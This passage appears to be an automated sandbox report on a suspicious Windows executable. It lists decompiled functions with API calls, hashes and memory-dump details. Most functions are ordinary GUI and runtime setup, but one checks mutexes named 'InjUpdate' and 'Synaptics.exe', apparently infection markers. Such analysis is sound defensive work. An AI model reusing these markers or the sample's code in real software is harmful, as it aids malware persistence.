                                                    0x0049a498
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0049a49a
                                                    0x0049a49a
                                                    0x0049a49b
                                                    0x0049a4a0
                                                    0x0049a4b7
                                                    0x0049a4bc
                                                    0x0049a4c4
                                                    0x0049a4ca
                                                    0x0049a4d5
                                                    0x0049a4dd
                                                    0x0049a4de
                                                    0x0049a4e6
                                                    0x0049a4eb
                                                    0x0049a4ed
                                                    0x0049a4f4
                                                    0x0049a4f4
                                                    0x0049a4f9
                                                    0x0049a4f9
                                                    0x00000000

                                                    APIs
                                                    • OpenMutexA.KERNEL32 ref: 0049A48F
                                                    • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                    • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MutexOpen$CloseHandle
                                                    • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                    • API String ID: 1942958553-1737343353
                                                    • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                    • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004590AC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 94%
                                                    			E004590AC(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403F10(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00421B3C(_t91, 0);
				_t42 =  *0x49dabc; // 0x49b520
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x49dabc; // 0x49b520
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x45a814;
				}
				_t43 =  *0x49dc10; // 0x49b528
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x49dc10; // 0x49b528
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0045AA0C;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E0042B3F8(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49d93c; // 0x49e030
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042B7C8(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
				_t60 =  *0x49d93c; // 0x49e030
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040E020(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00409FC4( &_v261, _t27);
				}
				_t69 = E0040E048( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x45150c
				E00404C30(_t31, 0x100,  &_v261);
				_t75 =  *0x49d6e4; // 0x49e038
				if( *_t75 == 0) {
					E004593B4(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0045B188(_t90, 0x100);
				E0045BB4C(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403F68(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                    0x004590ac
                                                    0x004590ac
                                                    0x004590b9
                                                    0x004590bb
                                                    0x004590be
                                                    0x004590be
                                                    0x004590c3
                                                    0x004590c6
                                                    0x004590cc
                                                    0x004590d1
                                                    0x004590db
                                                    0x004590dd
                                                    0x004590e2
                                                    0x004590e5
                                                    0x004590e5
                                                    0x004590eb
                                                    0x004590f5
                                                    0x004590f7
                                                    0x004590fc
                                                    0x004590ff
                                                    0x004590ff
                                                    0x00459105
                                                    0x00459115
                                                    0x00459127
                                                    0x0045912f
                                                    0x00459134
                                                    0x0045913a
                                                    0x00459141
                                                    0x00459148
                                                    0x0045914e
                                                    0x00459154
                                                    0x0045915b
                                                    0x00459162
                                                    0x00459169
                                                    0x0045917c
                                                    0x0045917e
                                                    0x00459189
                                                    0x00459191
                                                    0x0045919a
                                                    0x0045919f
                                                    0x0045919f
                                                    0x004591a5
                                                    0x004591a8
                                                    0x004591bb
                                                    0x004591c3
                                                    0x004591d6
                                                    0x004591e3
                                                    0x004591ea
                                                    0x004591ec
                                                    0x004591f5
                                                    0x004591f5
                                                    0x00459202
                                                    0x00459209
                                                    0x0045920b
                                                    0x0045920b
                                                    0x00459216
                                                    0x0045921b
                                                    0x0045922c
                                                    0x00459231
                                                    0x00459239
                                                    0x0045923d
                                                    0x0045923d
                                                    0x00459242
                                                    0x00459246
                                                    0x0045924a
                                                    0x0045924e
                                                    0x00459257
                                                    0x0045925f
                                                    0x00459266
                                                    0x0045926b
                                                    0x00459271
                                                    0x00459273
                                                    0x00459278
                                                    0x0045927f
                                                    0x00459289

                                                    APIs
                                                    • LoadIconA.USER32 ref: 00459191
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                    • OemToCharA.USER32 ref: 004591D6
                                                    • CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                    • String ID: 0I$8I$MAINICON
                                                    • API String ID: 3935243913-3756263232
                                                    • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                    • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401A9C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 571 401a9c-401abe RtlInitializeCriticalSection 572 401ac0-401ac5 RtlEnterCriticalSection 571->572 573 401aca-401b00 call 401460 * 3 LocalAlloc 571->573 572->573 580 401b31-401b45 573->580 581 401b02 573->581 585 401b51 580->585 586 401b47-401b4c RtlLeaveCriticalSection 580->586 582 401b07-401b19 581->582 582->582 584 401b1b-401b2a 582->584 584->580 586->585
                                                    C-Code - Quality: 68%
                                                    			E00401A9C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("��'");
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e5cc);
				L004013F0();
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L004013F8();
				}
				E00401460(0x49e5ec);
				E00401460(0x49e5fc);
				E00401460(0x49e628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49e624 = _t11;
				if( *0x49e624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e624; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
					 *0x49e60c = 0x49e60c;
					 *0x49e618 = 0x49e60c;
					 *0x49e5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B59);
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L00401400();
					return 0;
				}
				return 0;
			}








                                                    0x00401aa1
                                                    0x00401aa2
                                                    0x00401aa7
                                                    0x00401aaa
                                                    0x00401aad
                                                    0x00401ab2
                                                    0x00401abe
                                                    0x00401ac0
                                                    0x00401ac5
                                                    0x00401ac5
                                                    0x00401acf
                                                    0x00401ad9
                                                    0x00401ae3
                                                    0x00401aef
                                                    0x00401af4
                                                    0x00401b00
                                                    0x00401b02
                                                    0x00401b07
                                                    0x00401b07
                                                    0x00401b0f
                                                    0x00401b13
                                                    0x00401b14
                                                    0x00401b20
                                                    0x00401b23
                                                    0x00401b25
                                                    0x00401b2a
                                                    0x00401b2a
                                                    0x00401b33
                                                    0x00401b36
                                                    0x00401b39
                                                    0x00401b45
                                                    0x00401b47
                                                    0x00401b4c
                                                    0x00000000
                                                    0x00401b4c
                                                    0x00401b51

                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                    • String ID: (I$'$I
                                                    • API String ID: 730355536-3463978989
                                                    • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                    • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                    • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                    • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00434530 Relevance: 12.1, APIs: 8, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 587 434530-43457b 733AAC50 GetTextMetricsA call 424e24 SelectObject GetTextMetricsA SelectObject 733AB380 590 43459f-4345a8 587->590 591 43457d-434584 587->591 594 4345aa 590->594 595 4345ac-4345b8 GetSystemMetrics 590->595 592 434586-43458b 591->592 593 43458d 591->593 596 434592-43459d GetSystemMetrics 592->596 593->596 594->595 597 4345ba 595->597 598 4345bd-4345c2 595->598 599 4345c4-4345d7 call 43a75c 596->599 597->598 598->599
                                                    C-Code - Quality: 86%
                                                    			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* _t14;
				char* _t18;
				signed int _t19;
				signed int _t21;
				struct HDC__* _t27;
				signed int _t28;
				signed int _t30;
				signed int _t31;
				void* _t32;
				struct HDC__* _t38;
				struct tagTEXTMETRICA* _t40;

				_t40 =  &_v112;
				_t38 = __eax;
				_push(0);
				L00407638();
				_t27 = __eax;
				GetTextMetricsA(__eax, _t40);
				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth)); // executed
				SelectObject(_t27, _t14);
				_push(_t27);
				_push(0);
				L00407888();
				_t18 =  *0x49da40; // 0x49eb1c
				if( *_t18 == 0) {
					_t28 = _t40->tmHeight;
					_t19 = _v112.tmHeight;
					if(_t28 > _t19) {
						_t28 = _t19;
					}
					_t21 = GetSystemMetrics(6) << 2;
					if(_t28 < 0) {
						_t28 = _t28 + 3;
					}
					_t30 = _t21 + (_t28 >> 2);
				} else {
					if( *((char*)(_t38 + 0x1a5)) == 0) {
						_t31 = 6;
					} else {
						_t31 = 8;
					}
					_t30 = GetSystemMetrics(6) * _t31;
				}
				return E0043A75C(_t38, _v112 + _t30);
			}
















                                                    0x00434533
                                                    0x00434536
                                                    0x00434538
                                                    0x0043453a
                                                    0x0043453f
                                                    0x00434543
                                                    0x00434552
                                                    0x0043455f
                                                    0x00434566
                                                    0x0043456b
                                                    0x0043456c
                                                    0x0043456e
                                                    0x00434573
                                                    0x0043457b
                                                    0x0043459f
                                                    0x004345a2
                                                    0x004345a8
                                                    0x004345aa
                                                    0x004345aa
                                                    0x004345b3
                                                    0x004345b8
                                                    0x004345ba
                                                    0x004345ba
                                                    0x004345c2
                                                    0x0043457d
                                                    0x00434584
                                                    0x0043458d
                                                    0x00434586
                                                    0x00434586
                                                    0x00434586
                                                    0x0043459b
                                                    0x0043459b
                                                    0x004345d7

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 0043453A
                                                    • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                      • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                    • GetSystemMetrics.USER32 ref: 00434594
                                                    • GetSystemMetrics.USER32 ref: 004345AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                    • String ID:
                                                    • API String ID: 3751190600-0
                                                    • Opcode ID: 672c33895bb715ed287ccc6b5b5e89221a61783e3b8e8c8f3592199200a14ee8
                                                    • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                    • Opcode Fuzzy Hash: 672c33895bb715ed287ccc6b5b5e89221a61783e3b8e8c8f3592199200a14ee8
                                                    • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474948 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 53%
                                                    			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed short* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t76;
				void* _t93;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t111;

				_t109 = _t110;
				_t111 = _t110 + 0xffffffc4;
				_v40 = 0;
				_t93 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t109);
				_push(0x474ab3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				E004049C0(__ecx);
				_v32 = 0xff;
				_push( &_v28);
				_t52 = E00404ED8( &_v8);
				_push(_t52); // executed
				L004072A8(); // executed
				_v24 = _t52;
				if(_v24 == 0) {
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(0x474aba);
					E004049C0( &_v40);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = E0040275C(_v24);
					_push(_t109);
					_push(0x474a89);
					_push( *[fs:eax]);
					 *[fs:eax] = _t111;
					_push(_v16);
					_push(_v24);
					_push(_v28);
					_t65 = E00404ED8( &_v8);
					_push(_t65); // executed
					L004072A0(); // executed
					if(_t65 != 0) {
						_push( &_v32);
						_push( &_v36);
						_push("\\VarFileInfo\\Translation");
						_t71 = _v16;
						_push(_t71);
						L004072B0();
						if(_t71 != 0) {
							_v64 =  *_v36 & 0x0000ffff;
							_v60 = 0;
							_v56 = E004079DC( *_v36) & 0x0000ffff;
							_v52 = 0;
							_v48 = _v12;
							_v44 = 0xb;
							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
							E00404A58( &_v12, _v40);
						}
						_push( &_v32);
						_push( &_v20);
						_push(E00404ED8( &_v12));
						_t76 = _v16;
						_push(_t76);
						L004072B0();
						if(_t76 != 0) {
							E0040A174(_v20, _t93);
						}
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x474a90);
					return E0040277C(_v16);
				}
			}




























                                                    0x00474949
                                                    0x0047494b
                                                    0x00474951
                                                    0x00474954
                                                    0x00474956
                                                    0x00474959
                                                    0x0047495f
                                                    0x00474967
                                                    0x0047496e
                                                    0x0047496f
                                                    0x00474974
                                                    0x00474977
                                                    0x0047497c
                                                    0x00474981
                                                    0x0047498b
                                                    0x0047498f
                                                    0x00474994
                                                    0x00474995
                                                    0x0047499a
                                                    0x004749a1
                                                    0x00474a92
                                                    0x00474a95
                                                    0x00474a98
                                                    0x00474aa0
                                                    0x00474ab2
                                                    0x004749a7
                                                    0x004749af
                                                    0x004749b4
                                                    0x004749b5
                                                    0x004749ba
                                                    0x004749bd
                                                    0x004749c3
                                                    0x004749c7
                                                    0x004749cb
                                                    0x004749cf
                                                    0x004749d4
                                                    0x004749d5
                                                    0x004749dc
                                                    0x004749e5
                                                    0x004749e9
                                                    0x004749ea
                                                    0x004749ef
                                                    0x004749f2
                                                    0x004749f3
                                                    0x004749fa
                                                    0x00474a06
                                                    0x00474a09
                                                    0x00474a1a
                                                    0x00474a1d
                                                    0x00474a24
                                                    0x00474a27
                                                    0x00474a38
                                                    0x00474a43
                                                    0x00474a43
                                                    0x00474a4b
                                                    0x00474a4f
                                                    0x00474a58
                                                    0x00474a59
                                                    0x00474a5c
                                                    0x00474a5d
                                                    0x00474a64
                                                    0x00474a6b
                                                    0x00474a6b
                                                    0x00474a64
                                                    0x00474a72
                                                    0x00474a75
                                                    0x00474a78
                                                    0x00474a88
                                                    0x00474a88

                                                    APIs
                                                    • 73E714E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                    • 73E714C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                    • 73E71500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                    • 73E71500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                    Strings
                                                    • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                    • \VarFileInfo\Translation, xrefs: 004749EA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714E71500
                                                    • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                    • API String ID: 457087618-999260334
                                                    • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                    • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004587A4 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 89%
                                                    			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x49ebb8 != 0) {
					_t54 =  *0x49ebb8; // 0x0
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4588e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x49ebb8 != 0) {
					_t52 =  *0x49ebb8; // 0x0
					E0045AD24(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E004250B0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E00424FCC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E00424E10( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00424E10( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4588f0);
				if( *0x49ebb8 != 0) {
					_t38 =  *0x49ebb8; // 0x0
					return E0045AD24(_t38, _v5);
				}
				return 0;
			}






















                                                    0x004587a4
                                                    0x004587a5
                                                    0x004587a7
                                                    0x004587ae
                                                    0x004587b0
                                                    0x004587bb
                                                    0x004587bd
                                                    0x004587c8
                                                    0x004587c8
                                                    0x004587cd
                                                    0x004587ce
                                                    0x004587d3
                                                    0x004587d6
                                                    0x004587e0
                                                    0x004587e4
                                                    0x004587e9
                                                    0x004587e9
                                                    0x004587ff
                                                    0x0045881b
                                                    0x00458822
                                                    0x00458828
                                                    0x00458801
                                                    0x00458805
                                                    0x0045880c
                                                    0x00458812
                                                    0x00458812
                                                    0x0045882d
                                                    0x00458844
                                                    0x0045884b
                                                    0x00458881
                                                    0x0045888c
                                                    0x00458893
                                                    0x0045889a
                                                    0x004588a0
                                                    0x0045884d
                                                    0x00458854
                                                    0x0045885b
                                                    0x00458861
                                                    0x0045886d
                                                    0x00458874
                                                    0x0045887a
                                                    0x0045887a
                                                    0x004588a5
                                                    0x004588b0
                                                    0x004588b5
                                                    0x004588c0
                                                    0x004588ca
                                                    0x004588cd
                                                    0x004588d9
                                                    0x004588de
                                                    0x00000000
                                                    0x004588e3
                                                    0x004588e8

                                                    APIs
                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                    • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                    • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                    • GetStockObject.GDI32(0000000D), ref: 00458893
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                    • String ID:
                                                    • API String ID: 2891467149-0
                                                    • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
